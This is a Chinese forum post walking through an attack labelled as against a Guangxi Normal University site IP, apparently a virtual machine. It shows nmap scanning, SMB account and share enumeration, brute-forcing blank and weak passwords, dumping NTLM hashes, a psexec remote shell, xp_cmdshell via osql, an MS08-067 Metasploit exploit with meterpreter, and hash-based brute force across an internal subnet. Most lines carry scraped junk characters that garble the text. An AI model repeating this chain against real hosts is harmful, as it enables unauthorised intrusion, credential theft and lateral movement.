广西师范网站http://202.103.242.241/
% n" z7 J# X7 ]0 F" R1 S% @2 L/ ^% x' y: `0 i
root@bt:~# nmap -sS -sV 202.103.242.241; K7 i/ [9 Q* b2 E+ h, r
& X ^- p+ H; x5 Q. d x
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST1 F3 v6 j/ `6 S, c
$ U6 ~9 z9 W; f2 p
Nmap scan report for bogon (202.103.242.241)/ _- E2 L M0 b) \2 t+ d
& h( f3 ?: z8 E- _4 V
Host is up (0.00048s latency)./ O6 [8 O+ t5 S; T
, T/ \) V( S, U9 b- } o
Not shown: 993 closed ports+ u$ v9 Z. M- s- Z
; G+ B7 T# _6 X3 l" |1 bPORT STATE SERVICE VERSION
" x: e5 X. n% L7 C3 t- g8 [0 H) p
# ?3 T0 q/ I2 H; M( m135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
u9 b: V' H5 A% Z2 |' H. j' Q) ]7 S1 C
139/tcp open netbios-ssn" @7 H9 c5 F, i$ i7 j8 ^
3 W* O# x: L- s8 Q# O' q. r6 R
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
) k: \6 j" v" \$ R5 S% f% e, w
h* v* Q& u; E* Z* {3 k1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe), j: V8 x% [4 _# T( H
! q0 I9 {5 l4 s2 \# H5 \1026/tcp open msrpc Microsoft Windows RPC
% e. f9 N# H$ O9 T
. I, W3 g6 Y" }8 w3372/tcp open msdtc?; | n) y$ v3 l+ d
- @0 M6 w8 h2 g) Q3389/tcp open ms-term-serv?
* J4 g6 ~& N1 D0 I# Z" f8 n& \- e8 F* V7 B( x
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :3 U: ?6 a% C L2 p0 d. S
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
) j- h( r- c4 ]( [! f4 \+ u6 `# {% _: N0 E; t
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions6 Z* g+ Q: E" L" g, }
K6 `6 d5 E2 c. l& e8 e6 E# `9 s
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”); N$ B9 s9 q& _( T3 x
1 x- j8 Y: ^3 p& T$ e" DSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
$ \. B. c8 c6 y( D0 }. I
" i2 @* q! u) O E/ j0 ESF:ptions,6,”hO\n\x000Z”);
9 l1 V, c/ S0 |$ ]5 q7 r. V2 J5 `" \( _' \4 m
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)* B$ ~ |( Z/ R, w/ V" O( _
8 k7 P3 R4 w$ E+ |Service Info: OS: Windows
9 r, i0 L! v: V0 {1 [* |$ [
6 x9 h. \; `; i: o* S/ EService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
6 T1 e* S# V, m- }* f# V+ q
: ?; X% Y% W2 F( E( ]* nNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
. Q6 V$ s: p# ^; _. i' Q$ r
9 `- l* r! @! ^2 O4 S6 W4 {root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本3 F+ j/ d7 Y; M1 R" Z0 d
# F1 L1 w% t! a o4 G-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
! n8 A1 ?! M- q7 {" \5 L* x9 {3 m2 g) a; y# H [1 n
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
/ P! Y* D/ ^" b5 I/ d8 w1 U- x9 ~- g
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse- q3 E; W* c$ q, X7 C. U9 q
6 O" O8 n, R/ g/ K
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
6 e0 A- ?% v G% B; j* A- Q+ ^, @$ G9 f8 s. `
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
+ p0 _0 I, G; b# {# q/ G) u. V
# f _) ~ e6 b-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse9 E4 b* s, F& y8 O* n! m* q3 Q4 D
. y2 c0 H- k3 R; @
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
! i- [* f) {3 d3 M) u. t# [9 M
8 w9 Q, R2 x# o4 \; Q3 L5 D-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
; G6 ~) ?& Y$ V* Z1 [; R9 |% x0 v5 G7 ~
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse+ K5 R$ E2 o6 ? e! V0 J2 s6 e
" l& l% @' l3 ^+ C
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
! [0 {6 W7 e8 J5 |7 P4 i& q! `1 I; G! Z) ^: n" N% }
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse& V2 c' ^* t. U5 e# n: X! C6 T
) E- |1 ?6 Q( q' V
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse) @0 I( o; x3 {+ [$ E$ R1 V E
$ _* \* u7 w! J! R( e9 Y% L6 [+ Z
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse: y+ O6 W0 c9 M! w( ]0 L
) m3 t4 Y7 T4 @9 m
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse. G4 t* V/ j9 j! T
( V1 m2 n8 D5 z8 {-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
6 ?9 a, _, o" s% N8 R4 _3 ~1 N5 e+ v9 Y4 e/ m# F/ n7 q W
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 . c9 k* `8 H" _5 T
! x I7 Q: u# M! x: b% r! S. t//此乃使用脚本扫描远程机器所存在的账户名" f7 p# \ j m, t) S
6 R: _; h9 C) X& h7 hStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
& h$ T! {; ]/ w- ]% O/ v) c4 `) s3 Y Y
Nmap scan report for bogon (202.103.242.241)4 f! Y! \' f1 Q; r
+ x d; H8 Q8 C( `Host is up (0.00038s latency).0 s! I, d- _% J$ E6 v/ o5 M
( `* n5 P0 I& x- Y5 i% R) pNot shown: 993 closed ports! _8 C3 d( ~0 z! K7 c4 `5 _" a; Q- b
@4 i- `9 z- d y
PORT STATE SERVICE7 N+ f: Y/ K; q6 @* g) k; K/ ~
/ z8 u) s9 q% Z# O135/tcp open msrpc
1 K0 D' [. c" q7 c
: \1 H- b7 n+ B' e! I2 |# c; m# D139/tcp open netbios-ssn2 K) A: r, e7 v6 Y% E9 R- d
( g8 G j2 P1 S& {# c4 t/ [+ J
445/tcp open microsoft-ds
) C% g) D% o4 ^% D, ?2 s3 t* H w% j5 X
1025/tcp open NFS-or-IIS
- l. A6 f& Q. u9 Q) ] L3 @ M" l* A+ p2 I! H! W& p
1026/tcp open LSA-or-nterm' X# A6 Y. E$ F- F
+ o# g! x+ {' G! ^3372/tcp open msdtc N1 ?3 b) j" b$ m; ~8 d
. r) C0 `" @- {7 n" g
3389/tcp open ms-term-serv, \6 g3 H/ C6 a6 ] q
, H& w; F+ ?# f- Z+ y0 l1 uMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ q5 M1 v/ A: c
2 ~& N; c) g! m, K- D7 ZHost script results:. i6 X# M) Y' K2 p$ I, X, z+ {
$ \) @" P, j ]+ t3 B& Z
| smb-enum-users:5 E7 o6 P5 q; d- u% }
o/ H+ T0 u$ Z3 _' M+ }: ?|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果# n- e: L, i) N7 X
( j) ~ A6 l9 v9 H. _- h" g w; \Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds/ F* l: o" Z9 ]+ h5 J0 D1 B
* p' U8 c w" G
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
6 I* E3 M- f# n/ ]5 T% E" u/ d
5 }7 ?# C; j* z; |% M//查看共享2 Q# W/ |/ I/ A7 Z6 i
- r( \; Y/ I, H
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
- ]& f' T# A. s- W" i* ]( Q# l
. z/ `4 `, L) g, M6 Z# @& _Nmap scan report for bogon (202.103.242.241)( c% |' h, {: R C J
3 r& z4 D) F4 s2 v4 u& Z
Host is up (0.00035s latency).
; U3 u. N+ ~- h- [' r
, O0 }4 w/ N7 Q. { J" G2 iNot shown: 993 closed ports8 T/ N) A( I' }) I
* s/ h" q( h7 U9 L7 a; Q
PORT STATE SERVICE
1 ~- \% k+ |4 c. t' _
* \" U0 ]9 @ u n+ Y! c/ S135/tcp open msrpc' y! f9 D; D9 \ j) i% r) F
8 ^7 W) ] ]8 T3 ~139/tcp open netbios-ssn6 p: ~5 {! O a1 P2 L
: ]1 e( x* `# y& F445/tcp open microsoft-ds
+ o4 t# ]$ R3 W% @1 q9 K' s2 ^: ^ ?, O1 f% j% K! G1 k7 s1 G
1025/tcp open NFS-or-IIS
! Q$ V, P H/ A. Z$ ^6 X6 \, _6 `+ a$ f: U
1026/tcp open LSA-or-nterm
" s! k3 J1 U. @2 {. {; N& C$ L0 q( N# n' D: Z0 c
3372/tcp open msdtc
% f4 w/ e9 T" n: a, s
% k8 L- s" \/ }! v% y6 V3389/tcp open ms-term-serv
; b! ]6 q# }/ n3 M' S3 d! t. V& k# u( ^2 \! r4 C/ r- \) n6 l
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
1 g' X% ^$ w w7 {
+ z6 N% L" |% K$ s6 T. P- O. M# LHost script results:
4 |0 F5 D- n4 D; z0 P' x3 v I6 e0 x4 U+ @3 ]* w
| smb-enum-shares:
' `9 c$ P, O: G
4 _' n K, r; A| ADMIN$" i% f* J9 B. [. n# P
3 P) M1 p' ~/ s& l: C0 ]: o7 e h. n$ E6 b| Anonymous access: <none>
9 Q4 b4 \7 i0 ?3 |/ L4 _( z' y7 [, W" Z7 A. e& d- b
| C$3 Z6 P9 x4 D% D$ J/ L/ @: e8 ^
8 T1 S: S5 ]! J
| Anonymous access: <none>2 g1 O. ~, b5 r' G& \" n
- q0 u% {& ]6 ^& A6 ^| IPC$
3 z, y: k; A7 ?4 Y2 L
; j2 I7 q# x p% t) j2 o|_ Anonymous access: READ0 ^$ v+ b( [3 L9 R3 T5 z
+ B' q* j9 U1 ^Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds! J; `! ~8 ?. ]
1 @5 K W7 W, }8 i
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 ( ]0 N* z- s4 T# V# ?; r
- X; h( w2 u# q+ o* s1 l//获取用户密码
X: o: c* z" v6 m5 b; }3 S2 ^$ u/ X* `$ Q3 [( t5 K
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST; w4 t2 X& `5 J1 l) F* F
' z& I9 m; w: b9 B9 M7 mNmap scan report for bogon (202.103.242.2418): ?, Y6 ^+ k7 G K# W: N
" ?9 Z$ T. H0 |% e! n' F. FHost is up (0.00041s latency)./ K) Q& L: E+ R' d! x8 b
. w1 C+ R0 c- z' `) r7 p
Not shown: 993 closed ports
9 N6 Q- C! _: O. ?/ \% g& S+ l1 M6 P0 }3 Q/ D( J2 G M8 k5 _
PORT STATE SERVICE
8 z/ v$ q7 A9 n0 Y0 Y
( \1 b9 M0 T6 U0 ] k135/tcp open msrpc) I1 v2 I# Q' R I
+ k2 V: M6 a! A4 B2 m. h139/tcp open netbios-ssn
7 G+ @! s% E+ b
# o2 Y# \6 O6 X5 q# n: J445/tcp open microsoft-ds
5 Q4 `) [- N; V- h/ }
1 }5 U/ c+ \2 M# s& v6 [. l/ `0 Q1025/tcp open NFS-or-IIS
% ~* o, D3 ?0 X: _: G. G2 X" `- T
* K3 n; r3 K! a: z$ f1026/tcp open LSA-or-nterm1 T( Y0 f& C! q5 H. C, P
- P# x( y3 y* i+ d
3372/tcp open msdtc1 B0 X$ y6 H/ O4 O
# Z. ?" }5 @ k3389/tcp open ms-term-serv2 R0 j; X: ~* n4 L' t
c; G2 t4 Y5 g* S. ?& w/ DMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 s% [- r0 J) T( l$ A
/ H9 B0 k( C8 ]9 f
Host script results:
& d8 i7 z' ?' y* ]- S" |$ [ i7 r4 c! f! K1 r K4 Q
| smb-brute:7 u- ?7 B' v+ x6 |; D
0 H1 K0 q$ e6 M2 \) Z# ^administrator:<blank> => Login was successful! i7 F( q# F: x, e; W- ]
, |7 T7 C! I* @, Y, U* T4 k7 X, M
|_ test:123456 => Login was successful
+ H; J6 Z, B, U# p
$ a( H* \* s0 b" j$ Z$ P) t7 dNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
) ]7 Z" ]' U) s/ i0 i; J& t' z6 q B% ~
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash/ Y" W0 i Y. U3 V, ]
" ?! d: X9 P! w2 x9 a* \root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data# g, d) M0 F' x/ ?
! M6 N) C& v7 K; p$ T
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse! u1 M5 H- X( A1 z
1 a- x8 H9 ^3 Q5 O. u3 ?root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1393 c6 ?* V: G$ x
( Y: e/ D" y/ O+ H1 ]! @
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST6 B% W+ F" C4 k% O
& Z, H2 T2 r" J0 INmap scan report for bogon (202.103.242.241)
/ z' c' w# y% v. l7 O3 ]; |' n/ K, J' V
Host is up (0.0012s latency).4 ?+ Q& T! `6 D1 \# K. x, H
2 ~$ c( ~ h! |1 ]& q* Q& ^0 jPORT STATE SERVICE' }* C- F1 Q$ u0 b3 j# H ^6 P5 t
. }( i! b$ q9 Q% Q135/tcp open msrpc2 l# X- q1 `/ N2 W: h
1 H. C }+ V) ~; F% s% y: T! J& |
139/tcp open netbios-ssn
+ {) I% q' X4 m4 E9 ^$ g: V, ]9 y9 t' l
445/tcp open microsoft-ds
8 ~9 k5 N4 w4 ]: J( _0 Y6 q. p2 Q& G& E
, Z/ t/ H" y1 DMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ B8 k* ~6 a8 X6 m( D3 c" q6 z& W, G
2 X5 K9 p% r" i/ aHost script results:
# a# @2 q+ Q B9 r# y2 T! h
( c& i9 S5 C4 K- Q| smb-pwdump:. a, Z2 o) `2 [) t* E a5 |
8 J" s9 b+ ^$ d: G; `| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
, b- d+ L6 N+ N* Y* ]/ p8 D) k3 ]* N7 }! z) ]
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
7 C! R* M) ]; w- t K" p+ m# n5 g4 k( m7 |+ g) Y
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
: m! r0 s2 k' z5 l7 F' K& q/ g, v6 ^- j- O* N% Y
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
( e& N# d! s, T. F" r5 C/ x) l1 j1 X7 ]
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds' _9 h+ A- W/ ?. s7 P0 a
1 c& I8 i! W0 B" A: A7 }
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell% M8 F; M. Z0 g' V9 a R7 \
+ ]& B/ n1 _' G0 X( T
-p 123456 -e cmd.exe6 U% _' S* R& H, {0 _
) q. n, G7 _$ ]; B2 _PsExec v1.55 – Execute processes remotely3 J, [/ V* c4 q0 ^9 a) m" G# o
: m2 O# g; {, ^* d& x
Copyright (C) 2001-2004 Mark Russinovich2 F! ~7 H: `0 N( L' ~2 w
8 F$ |$ l/ k9 Y3 I5 W4 y5 D, x
Sysinternals – www.sysinternals.com/ J$ E! R+ `1 Q6 H% z$ M- a% D" ]! p
3 q# C M) c+ L2 }2 q6 R: uMicrosoft Windows 2000 [Version 5.00.2195]
' ^ r5 E/ _: W# m' n
, t2 u6 a. z1 m8 p(C) 版权所有 1985-2000 Microsoft Corp.
$ y' S& Q3 n/ t9 l& z5 a: ]" o0 U4 z
C:\WINNT\system32>ipconfig
! }* P( O ~6 _- K6 {; e) r0 e* F7 {; _$ o
Windows 2000 IP Configuration
9 O' }- f" n" f" m# R7 s$ p z7 P6 U5 v0 a! j
Ethernet adapter 本地连接:
6 y3 q. }$ h! {4 S; g! p h R$ x! O( X S8 h
Connection-specific DNS Suffix . :
/ M1 u* b! L4 k* N! [
, a, U; ^6 N0 `+ t; IIP Address. . . . . . . . . . . . : 202.103.242.241
1 d) }' N* O* Y* _4 W) h, D1 a! V
Subnet Mask . . . . . . . . . . . : 255.255.255.03 ~6 K* g8 M; W, r5 }
E- Z' m; x0 U. j+ N
Default Gateway . . . . . . . . . : 202.103.1.1
C8 v, a" c! Y# K( Q
& B4 }: z$ S! H6 U. l/ ^C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令, u o: N% h2 Q- n; `( n
% m6 o2 D6 o; b4 z2 \, J
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
2 Z7 v% @& ?# B6 J$ u! N; ^. s r6 E/ k; ~+ G
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
3 F9 G. A* {) U
" M4 L4 M( z6 {( D8 XNmap scan report for bogon (202.103.242.241)# ` r; [5 w7 D, v; k7 C( R
" b+ s' Z; O9 d" WHost is up (0.00046s latency).
( D. G1 k& d a) w
3 v0 I& H& c/ x) \" w9 zNot shown: 993 closed ports
q+ C5 }7 K. h P5 ]2 u- a3 G6 @3 u c* B1 V5 `' M3 m9 \
PORT STATE SERVICE2 U+ y5 ~- u/ t
9 r# n! J6 P. U) \4 c135/tcp open msrpc
0 @2 ^& b1 Q8 B, {$ F7 L: \1 v* p3 G
139/tcp open netbios-ssn
* R$ m; S( B" p
/ `' H1 }+ }) v$ p0 _* z: y445/tcp open microsoft-ds. V' q: N* t9 {. ~
s4 ?4 k1 v* ]3 u1025/tcp open NFS-or-IIS+ J- H4 ]' G* A7 n# T. S
( F% p) F" L" c( D1026/tcp open LSA-or-nterm6 y* c. j4 h# \' R0 G! c
0 i; @' Q; }: J
3372/tcp open msdtc1 ^: q+ R5 e- t
3 G/ \( Z e5 W: F' Q9 N) E1 v Z3389/tcp open ms-term-serv
% \ L2 p0 E! S- [
4 H4 ^+ a4 F4 A4 AMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ ?* f$ x' ~( h
- r6 z, T% h2 p' V7 Z
Host script results:* {& d+ `1 ]* \! f
- T' y! L, o2 g5 b3 D. y8 U
| smb-check-vulns:1 i4 H0 h5 x( r; E3 S+ V
6 L" }/ i4 T E2 e
|_ MS08-067: VULNERABLE$ y+ E$ W5 i2 }; `
5 n6 Z6 `- c1 P3 w# l
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds, q1 V) y6 r! M% A
. z0 x N& M/ Q( |1 U! w
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
" | s9 J0 w0 R
8 U$ x" e9 g8 n& dmsf > search ms08
" w* ]* h4 f/ ~9 J1 Z/ ?2 o7 [; y3 e6 B
msf > use exploit/windows/smb/ms08_067_netapi
% |9 ~: h+ ?( v* x
6 X3 u: A& e: E& t! cmsf exploit(ms08_067_netapi) > show options
- f2 E# f6 E9 e; O* t
( t" ~' y: k% l' hmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2416 F3 A& W% j' k( ?8 m
8 l* n( V q6 d- j
msf exploit(ms08_067_netapi) > show payloads
" _6 i% e" M% ~/ @& ~0 l9 O& Z* E9 H7 c- v5 t
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp- ]& f$ J7 m( C( [. D0 |
+ N0 u' x' o$ L7 m/ n# S# amsf exploit(ms08_067_netapi) > exploit0 e* I4 p q/ ]# a+ k/ Z
# z# T9 r1 [8 C" Ameterpreter >
1 k* p& G+ j; t7 h/ f
/ |( {3 W5 W! e& k- k% r" Y! ^Background session 2? [y/N] (ctrl+z)
+ p& J! m- ], E" h; k
! O3 H+ H+ ~: ^' @- i0 Q( ]msf exploit(ms08_067_netapi) > sessions -l1 m* E8 s% y( P, A
1 m+ `0 x9 `. r" {( Q5 ?# E3 x+ I8 s
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
( T) h7 j: J/ l/ y( C2 R1 }/ j6 C
test/ {* L1 y4 u8 F
5 _7 }$ G a# w5 ladministrator
8 I5 M1 a# p& z# ^2 V
% }: l9 Q: ~/ b; nroot@bt:/usr/local/share/nmap/scripts# vim password.txt) m6 D& ]- K/ L, m' C5 O3 g
9 t: s+ @3 }2 M4 i! Y" @4 r6 M44EFCE164AB921CAAAD3B435B51404EE6 f& ^9 }" M! U7 m6 F
8 @5 G2 b4 N! q
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 0 ?& x8 G1 t" L% T7 E6 S
! P3 N: M" j- f# \( T- h
//利用用户名跟获取的hash尝试对整段内网进行登录 W2 } R, _; I1 l5 u8 P8 U! G2 n' [
' d2 ~# I# |5 C X k4 \! L- ^8 _Nmap scan report for 192.168.1.105
+ X7 G2 ^; O- G0 K, I
( `% o1 s& T+ H+ eHost is up (0.00088s latency).
" u& }2 G9 ?( n* K; r
O; S" c0 h4 Z" s: x. TNot shown: 993 closed ports
( }2 N! I& y/ E: o4 f* d! ~- [4 ~9 y" N! d! G
PORT STATE SERVICE
3 e( D1 H8 P4 @0 j9 Q/ C
: s6 s6 o$ E! R9 p" c- `% v9 U135/tcp open msrpc4 t. K6 f+ R6 W. x g
5 F2 [* P/ h' @% f- _. Q
139/tcp open netbios-ssn; N7 C9 _& q# f5 c/ O
7 D, n5 q: e: Z2 t' ]" `9 D: C
445/tcp open microsoft-ds
% n7 [; b& M/ b: V3 F r. Y, ~- G7 u+ ]& G+ Z
1025/tcp open NFS-or-IIS
/ v0 k- b9 `+ F
s' T8 z: v" N* D1 L6 i0 b1026/tcp open LSA-or-nterm
) \3 Y1 ^5 j- s" W7 x# E
. W) [7 o! u$ N; O; f' {3372/tcp open msdtc
. n! v) d: Z e: M% _3 E
; E z; j; c1 o1 H* B3389/tcp open ms-term-serv% U. e9 i, t) T0 ~7 z( O
& Q9 C: c7 l4 GMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ l* |6 o( P( m; X- E l8 k
/ \; Q! p" ^" F4 [7 y1 u
Host script results:- ]7 J6 J- Y' O/ i) A# l! d/ S" D2 ^$ V
+ ?4 C3 I3 z( e+ U( |1 p
| smb-brute:
( d6 Z J6 S, E1 K: S. L
( j! u$ `) n' T/ n: d! p|_ administrator:<blank> => Login was successful
& d* `. x2 A" N+ |' p+ i- b0 t9 _- Y
. Y6 F. W' L4 ]; a" v) J) h7 ?攻击成功,一个简单的msf+nmap攻击~~·/ b7 W( \+ X2 h9 Y F
* K4 Y4 l8 ~! C+ _% u
|
发表于 2012-12-4 12:46:42
收藏
支持
反对